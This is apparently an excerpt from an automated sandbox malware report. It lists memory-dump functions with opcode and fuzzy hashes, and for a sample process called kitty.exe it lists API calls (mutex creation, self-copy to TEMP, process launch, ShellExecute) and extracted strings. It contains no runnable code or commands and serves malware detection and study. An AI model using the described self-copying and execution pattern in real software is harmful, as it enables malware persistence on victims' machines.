Instruction ID: 7a5d6bca8e1834f880d42637a4544a2796bdf52710882993ae971745dac77858
Opcode Fuzzy Hash: 2f54caca23f3fd5640b1effd9977d7e34fbc799e7b52a97a7869391b09cdd386
Instruction Fuzzy Hash: 2411B231B0CA084BD76CDB2C985A5BABAD1EB9D721F01027FF04DD32A2CE60AC418685

Function 00007FFD9BC33DA3 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1843790582.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bc30000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 759ef9b74e1b13a9be0242df21e4418599f9fa1754cc81001debca703d559a2d
Instruction ID: b01743fef87987c8ceb01b0bd7b8d4cddb95df31ad852c8f17ceec06c06c0d9b
Opcode Fuzzy Hash: 759ef9b74e1b13a9be0242df21e4418599f9fa1754cc81001debca703d559a2d
Instruction Fuzzy Hash: 5111B630719D4E9FDBD5EF2C84A0A6977E2FFD931035501A5D44ECB2A6CA24ED46C780

Function 00007FFD9BC3644D Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1843790582.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bc30000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8d06d39a2d0f7040a153777e072e130c754a60662e3ed1c6f037b991f23defe
Instruction ID: 3c1890464d0f583e1c8b163b2077f695d7f7319f69d54e9b4783856dca4fa92e
Opcode Fuzzy Hash: d8d06d39a2d0f7040a153777e072e130c754a60662e3ed1c6f037b991f23defe
Instruction Fuzzy Hash: BA01F522D4F7C50FE7AA57702C764F53FA48F4222030E42FBE0988A5A3D80D1A838351

Function 00007FFD9BC368EC Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1843790582.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bc30000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 064c21c35beeafa6b692bba845fe48f84cd3d178f41a7fc9bab8bed69d6c6dc4
Instruction ID: 01580f64e17bb28927bc46fc5538c686a7a4bff239077e404da03f70c7d5006e
Opcode Fuzzy Hash: 064c21c35beeafa6b692bba845fe48f84cd3d178f41a7fc9bab8bed69d6c6dc4
Instruction Fuzzy Hash: C2019231B0EB1C4FD768AABC54291BEB6D1EF9C265F45057FE40DC32A1DD2599018781

Function 00007FFD9BC358BC Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1843790582.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bc30000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25773c8e0188c410d931394dc21baff24b0786283b15ccced6d83a668ca877b3
Instruction ID: 01e966df590f1f6b89dd2ae5eac814ca67d564372ef1b0a424ea31e734479b64
Opcode Fuzzy Hash: 25773c8e0188c410d931394dc21baff24b0786283b15ccced6d83a668ca877b3
Instruction Fuzzy Hash: 4D012852B1EE0F1BE6E4DA6C04A167923E1FF682507810139D84EC3292ED49F9028380

Function 00007FFD9BC34C10 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1843790582.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bc30000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5065da03052f7253022ec5efbe5feb6b379d046f2c80c867a6a3af7e3c650fe8
Instruction ID: fc177e8362bda88cc39b6ffa17350dbb9ebe15fa4b0d266c3aa9a4772bd3a3cf
Opcode Fuzzy Hash: 5065da03052f7253022ec5efbe5feb6b379d046f2c80c867a6a3af7e3c650fe8
Instruction Fuzzy Hash: 5A118231619E4E4FDF9DDB28D07097577E1EF5A344309059E805ECB6A6CE21E842C700

Function 00007FFD9BAB6D38 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1831634856.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bab0000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2f4e6d21c2045928d49ed8e393491debe97d26477f1e0829b405df9d4ca7e87
Instruction ID: b866d7db9ae9874ea9ee0eaded7cca86dea230c85baf97b60d108e8f789193cb
Opcode Fuzzy Hash: d2f4e6d21c2045928d49ed8e393491debe97d26477f1e0829b405df9d4ca7e87
Instruction Fuzzy Hash: CE114832B0A65D8FD711DBACC8501EDBFA0EF41315F1546B6E400DB2A1E97456458B80

Function 00007FFD9BC35EBC Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1843790582.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bc30000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f81c7cfa3b04f7dad1c17ef446c7356530e3d0a9739c54e98cb93646d7fcedd
Instruction ID: ef9901474ff65d612480006cd20633ce1efd6ae15abeeda57194e9f28a9142df
Opcode Fuzzy Hash: 1f81c7cfa3b04f7dad1c17ef446c7356530e3d0a9739c54e98cb93646d7fcedd
Instruction Fuzzy Hash: 74F07D31F0EA0C0FE27CA67D585557936D1EF99235F44413ED44DC21E7DC2A78428340

Function 00007FFD9BC3237C Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1843790582.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bc30000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b2fda89badb69d7a22d132e34f31c384b3fb3f1cc449df9e3d0cac092b1a95d
Instruction ID: 70d9f0ad5a40a9ba19e3cc6691c9dc9426d31f9e5ea0f235c2309cde67c05a60
Opcode Fuzzy Hash: 8b2fda89badb69d7a22d132e34f31c384b3fb3f1cc449df9e3d0cac092b1a95d
Instruction Fuzzy Hash: 88017D21B0E98E4FD7869BBD1870178BBC1DF8A344B5900F6D44DCF2A7DD156D428301

Function 00007FFD9BC358C0 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1843790582.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bc30000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8521d2284401439251d35b03a94cf2aa3be850da23cdb4a8a582b9b57fd7d0d3
Instruction ID: 547d9638692547db3608eb01586ce156969c00ac62b737b525aab1335657642e
Opcode Fuzzy Hash: 8521d2284401439251d35b03a94cf2aa3be850da23cdb4a8a582b9b57fd7d0d3
Instruction Fuzzy Hash: 42F02B21719E1F1BD5E4DA6D58A0A7A73E4FF68364781023AD40DC3195ED49F9418380

Function 00007FFD9BAB34AC Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1831634856.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bab0000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 507f12b0b2bf516cd1b958a7645f17e414983fc173bae3bc1427ff0409c1981c
Instruction ID: 13b9b1eb64e31f5c784fe7abc96867ec4022cd612c9a6b41adb7b7def20e799b
Opcode Fuzzy Hash: 507f12b0b2bf516cd1b958a7645f17e414983fc173bae3bc1427ff0409c1981c
Instruction Fuzzy Hash: A401F131A1DB598FDB64DF08802093977E2EF88350F060479E49AD3292CA60FC418B82

Function 00007FFD9BC34BF6 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1843790582.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bc30000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3b01cd0e2d0483d8a6bc05cfe249f67de0f75c0fb740ba4ac9d4f20b9a6f845
Instruction ID: 0a098b2d5a2459347e41665772b7bd06a121e1370a245efb4c3d5c38ccdea6bf
Opcode Fuzzy Hash: b3b01cd0e2d0483d8a6bc05cfe249f67de0f75c0fb740ba4ac9d4f20b9a6f845
Instruction Fuzzy Hash: 8BF0F421A0FE9A4FDFA99774643455C3B90AF8634470E08EDD099CF1A6C915E902C301

Function 00007FFD9BAB83BC Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1831634856.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bab0000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6980c32e583291cdce00017a19fdfcb28a57d1730121fc4f82b82d250de7c26
Instruction ID: 5036a7e7f075657149556398be12eae3283d1021a427fce5facfe9f663264034
Opcode Fuzzy Hash: d6980c32e583291cdce00017a19fdfcb28a57d1730121fc4f82b82d250de7c26
Instruction Fuzzy Hash: 6101A251F0E96E4FFAB597AC80742741781CF6A350F1602BBC42DC72F6EDA86E025B41

Function 00007FFD9BC31F3C Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1843790582.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bc30000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5ec8d2b3c32f3b00f3c79d3fb9c75af979bc2b3a26a63da2c961b494e32876d
Instruction ID: 283591e1e20ccbcf507a7479a8d379c95e11b15233a610aaff990b42527c0488
Opcode Fuzzy Hash: b5ec8d2b3c32f3b00f3c79d3fb9c75af979bc2b3a26a63da2c961b494e32876d
Instruction Fuzzy Hash: 4501D662A0EE8A4FE7B9D77D08705242B91EF5E34074A44A9D08DC76BAEA55AC048341

Function 00007FFD9BC36988 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1843790582.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bc30000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca2ecdf7723b2fbd4bb6b1041b4098d8bbd5d204ec23a1289969a59e75dd6e27
Instruction ID: caf164f9db13cd2ad0ebef44ebf417f330418f2430aba50209f1d70a245a37d2
Opcode Fuzzy Hash: ca2ecdf7723b2fbd4bb6b1041b4098d8bbd5d204ec23a1289969a59e75dd6e27
Instruction Fuzzy Hash: 0FF0C252A0FBAA0AFABCA5BD547507C6A90DF45644B8604BEE06EC61F2DC4469414241

Function 00007FFD9BC3613B Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1843790582.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bc30000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21dcbaa7bdfcc26774d0a6d1b3263a97074057aa9e8e2c3936be73e9bb5780dd
Instruction ID: 023b57864dd1f9293febae574a8400b64f8f4688f4a0dcda011ea2739a68f41b
Opcode Fuzzy Hash: 21dcbaa7bdfcc26774d0a6d1b3263a97074057aa9e8e2c3936be73e9bb5780dd
Instruction Fuzzy Hash: 41F02B50B0DD4A6FEB96EF3C4070A297792EF9A38071A00B4D04DCB2D7CE28E9438700

Function 00007FFD9BC339A2 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1843790582.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bc30000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 404a0aee9e1214a64ad88b918277a64c7117cc1addb72c92f7c94ba751e8917a
Instruction ID: 76a47cd13b44b1c2b399d61e55d55645987da4a20342e043478303b54478cc5f
Opcode Fuzzy Hash: 404a0aee9e1214a64ad88b918277a64c7117cc1addb72c92f7c94ba751e8917a
Instruction Fuzzy Hash: EAF0E961B09A0B4AF3A85ABC94751FE73D2EFD5321B95433BD42EC26F4DE2479418380

Function 00007FFD9BAB08A9 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1831634856.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bab0000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cdf1825c8b539acef1de14120a7882f0fe14c8f036c5f07aa97404c9908ac1d
Instruction ID: 71fffc5895a3bd2ab26a87e25837cbb932f0e13a552f7c6cbb1c92d43f4d54d2
Opcode Fuzzy Hash: 4cdf1825c8b539acef1de14120a7882f0fe14c8f036c5f07aa97404c9908ac1d
Instruction Fuzzy Hash: 13F07F6294F3C80FE7235B6158710947F70AE23510B4E56DBE4D89B0A3E549AA18DB52

Function 00007FFD9BABF690 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1831634856.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bab0000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 771a4075d6b8788f70be861105fb056826f48a4fb3f5bdd515a9896c7233bbb2
Instruction ID: a7be0c682964b8b2bb21f9974b0561ea138ae17d42d63d15af060b03a5fcb5cd
Opcode Fuzzy Hash: 771a4075d6b8788f70be861105fb056826f48a4fb3f5bdd515a9896c7233bbb2
Instruction Fuzzy Hash: F8F0E914B0D94D0FE785EB38447867037D1EF5A314F4500E9D40DC72F6DD1498518301

Function 00007FFD9BAB6DB9 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1831634856.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bab0000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19eaa69683ca7dafdbc62cb495fe14d023d28ca1958cc0d4c3ef8e515fb7f5cb
Instruction ID: 40be8db645a11eb6babd865ecc2e9b302a077e2c61b7cef2ecd7a5d2fbf91fb4
Opcode Fuzzy Hash: 19eaa69683ca7dafdbc62cb495fe14d023d28ca1958cc0d4c3ef8e515fb7f5cb
Instruction Fuzzy Hash: 20F0F630B0968D8FF711DB58C4947ECBBA0EF12310F0441B5D069CB2E6DA786684CB40

Function 00007FFD9BAB2B4D Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1831634856.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bab0000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddc53af4cddfaa6749e249b8d3f7fbbcddc71fc73dd10115e2f464509c85dd1b
Instruction ID: 8a5e64da62712935cbf9fe4e572e007eaa40675d1ead4994a8a07570cdef38b3
Opcode Fuzzy Hash: ddc53af4cddfaa6749e249b8d3f7fbbcddc71fc73dd10115e2f464509c85dd1b
Instruction Fuzzy Hash: F9E0D8256085914FCB14F73C9CE14D97B60DF1522A74801A6F48CC5093D505A893C381

Function 00007FFD9BC31EC1 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1843790582.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bc30000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa8149e9fe16f278abc0d073815f7ba634c05c51be6a4d6e46ea1c2f5393cc3e
Instruction ID: ee59a937b5cf30746e3766909420ed68aae22ea349825caf5dc223e0d3d11389
Opcode Fuzzy Hash: fa8149e9fe16f278abc0d073815f7ba634c05c51be6a4d6e46ea1c2f5393cc3e
Instruction Fuzzy Hash: 8DE017A181F7C51FD70263B9082D058BFA0AD2321138A04EFC0C6CB1B3D41E085A8702

Function 00007FFD9BC36990 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1843790582.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bc30000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 297925a9838e2768f0a6f49a2f066e5a0932f5ad2301017c976d59410a402420
Instruction ID: fa25b6ebcbb6f4151f6d1017743bb736b7c2981c76aa95a38618cbb66e652a67
Opcode Fuzzy Hash: 297925a9838e2768f0a6f49a2f066e5a0932f5ad2301017c976d59410a402420
Instruction Fuzzy Hash: B6D05E52B1E92E0AEABCA1BC14251AC5691DB49648B4505BBE01EC31FAE8441D0842C1

Function 00007FFD9BC339F1 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1843790582.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bc30000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 359c386ffd42520a9ef63fdcec20b2dd721173672361d3447991e479952c3642
Instruction ID: eef9bc4b8fd095e42e15786c05cd9cced0372b9e13c3328101292b847192319e
Opcode Fuzzy Hash: 359c386ffd42520a9ef63fdcec20b2dd721173672361d3447991e479952c3642
Instruction Fuzzy Hash: 3ED0A711F1D809069A04E5A4F8519EEF3C0DF8426DB044B35D409C10ADDD1D96810241

Function 00007FFD9BC31EF5 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1843790582.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bc30000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64e6d6046f746687f17601831d6283342bd190ef6436143efb6c8b4b06d813ad
Instruction ID: 718885f0bbe25ea61e299f522ae19d5d49057f5d15a521190000f174aaf83329
Opcode Fuzzy Hash: 64e6d6046f746687f17601831d6283342bd190ef6436143efb6c8b4b06d813ad
Instruction Fuzzy Hash: 3DD0C96184F7C64ED7272A750A650843F70AA2324478E02E7D480C90A3E85E869F8362

Function 00007FFD9BC39CB5 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1843790582.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bc30000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d7a6c95bffd6bf996269b5d8741d9431f846c5265fc4d586ae388325ac50358
Instruction ID: 1fe0cabbc39fae451ec71f905c48a8e3cff80dc71d1bf8e09438ab79c11bfdcf
Opcode Fuzzy Hash: 2d7a6c95bffd6bf996269b5d8741d9431f846c5265fc4d586ae388325ac50358
Instruction Fuzzy Hash: C5D09E5184F6C50EE71367B91D754987F609E23110B8E42EBD0D9CB2E3E98E165A8312

Function 00007FFD9BC35620 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1843790582.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bc30000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d440f727c25d176897bd74b9cc55da572108cb66c0f01a0e2adf577740ac800
Instruction ID: a81716f002a8dac9df4dbbe8c82a241f8f79d22a7b2c8b2a8fa87ac24aaaf0aa
Opcode Fuzzy Hash: 7d440f727c25d176897bd74b9cc55da572108cb66c0f01a0e2adf577740ac800
Instruction Fuzzy Hash: EAB0123484752941C61836B61CD305830906F4610EFC26974E804442DAD4BF41D96381

Function 00007FFD9BC39870 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1843790582.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bc30000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8619f140a4c853edcb991163b0ad4b4dfb139113dce49d0ad067c6a177c2f46
Instruction ID: 2b2262d246df370b5bda194e5bc057d8d8990a01432fda229068ce5d7553354c
Opcode Fuzzy Hash: e8619f140a4c853edcb991163b0ad4b4dfb139113dce49d0ad067c6a177c2f46
Instruction Fuzzy Hash: C7B02430D4370F45CD3D31710C4304430505F45105FC50574D40440151D47F47D54343

Function 00007FFD9BC3A160 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1843790582.00007FFD9BC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bc30000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eeca996a3b1da251ce81672b933b908e4820be5b973e7375646542b36bf3ad3
Instruction ID: 61c617f0597545516b9ecf76f27f8dfd24bf4f3200cb9eb208e0a3ae2a4ef274
Opcode Fuzzy Hash: 0eeca996a3b1da251ce81672b933b908e4820be5b973e7375646542b36bf3ad3
Instruction Fuzzy Hash: CEA00204D97C1B01994C39BA1D97895B4505B89118FCD65A0F918801CAE9CE25F902A3

Function 00007FFD9BAB8D66 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1831634856.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bab0000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b99630a493bd7d4b686915ca6d1040ee8b540d136ec1b3bf94ce0c85eb1b5f5c
Instruction ID: 49b5797579133133815629806ae5e6e0db8ea216e5dbf91fe56bf3301d0eed23
Opcode Fuzzy Hash: b99630a493bd7d4b686915ca6d1040ee8b540d136ec1b3bf94ce0c85eb1b5f5c
Instruction Fuzzy Hash:

Non-executed Functions

Function 00007FFD9BAB5C98 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1831634856.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9bab0000_52i.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e68a991573aced734c630d63b0650f5399d1b2128982a027bbecc6aba397bab2
Instruction ID: 637ee452391653ac1cbd3376ebaee8e56c469e683995e1ade3823525640e5dee
Opcode Fuzzy Hash: e68a991573aced734c630d63b0650f5399d1b2128982a027bbecc6aba397bab2
Instruction Fuzzy Hash: 0041AEA681E7D14FD7138B749C726817FB0AF17214B4E0ACBC491CB4A3E1585A2AE762

Analysis Process: kitty.exePID: 8052, Parent PID: 7808COMMON

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	34.2%
Total number of Nodes:	887
Total number of Limit Nodes:	11

Executed Functions

Function 001D6620 Relevance: 46.7, APIs: 13, Strings: 12, Instructions: 2929synchronizationprocessfileCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNELBASE(00000000,00000000,?,00000000,Global\,00000007,?,?), ref: 001D682C
GetLastError.KERNEL32 ref: 001D68AC
GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 001D68CE
CreateDirectoryA.KERNELBASE(?,00000000,?,?,00000000,0020D8B8,00000001,?,?,?,?), ref: 001D6BC5
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 001D6BD9
CopyFileA.KERNEL32(?,00000000,00000000), ref: 001D6D4A
CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?), ref: 001D75EA
WaitForSingleObject.KERNEL32(?,000000FF), ref: 001D75FC
CloseHandle.KERNEL32(?), ref: 001D760E
CloseHandle.KERNEL32(?), ref: 001D7616
ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 001D83FC
GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104,00000004,00000006), ref: 001D846F

Strings

E[?, xrefs: 001D7B9E
E[?, xrefs: 001D7A45
E[?, xrefs: 001D6E4A
E[?, xrefs: 001D7FE1
E[?, xrefs: 001D8CE1
Global\, xrefs: 001D67EB
" /F, xrefs: 001D72F7
E[?, xrefs: 001D7029
E[?, xrefs: 001D6BDF
open, xrefs: 001D83F5
TEMP, xrefs: 001D68C9, 001D846A
E[?, xrefs: 001D8B7B

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: Create$CloseEnvironmentFileHandleVariable$CopyDirectoryErrorExecuteLastModuleMutexNameObjectProcessShellSingleWait
String ID: " /F$E[?$E[?$E[?$E[?$E[?$E[?$E[?$E[?$Global\$TEMP$open
API String ID: 747220738-766119990
Opcode ID: 1e4d1fc2c2950983ee5191486ba86c858bfe95159058b5cf72ce22da2c0f5715
Instruction ID: a20d24d5e6b9b4840a614fdb434b6b8812b30aceff61d5d280fe8a3632019ab9
Opcode Fuzzy Hash: 1e4d1fc2c2950983ee5191486ba86c858bfe95159058b5cf72ce22da2c0f5715
Instruction Fuzzy Hash: 5B43F575D116888BEB06CB74CC557EDF775AFA6344F14C39AE404B66A2EB306AC6CB00

Function 001E8C8F Relevance: 26.0, APIs: 4, Strings: 8, Instructions: 5048COMMON

Download Yara Rule

Strings

z}7, xrefs: 001ECEC4
ctx`9, xrefs: 001E9471
fyyq9, xrefs: 001EA1D1
wytpj:, xrefs: 001E98B1
XSZ]A_;, xrefs: 001ED56B
@FSYM_;, xrefs: 001EDDE1
7<=<I, xrefs: 001EBCE1
dszm9, xrefs: 001E9031

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID:
String ID: 7<=<I$@FSYM_;$XSZ]A_;$ctx`9$dszm9$fyyq9$wytpj:$z}7
API String ID: 0-1094075928
Opcode ID: 6555725ce7bbd31496c210ccb45b3b24cbd47f17c955df8f997b82a6920a9cb0
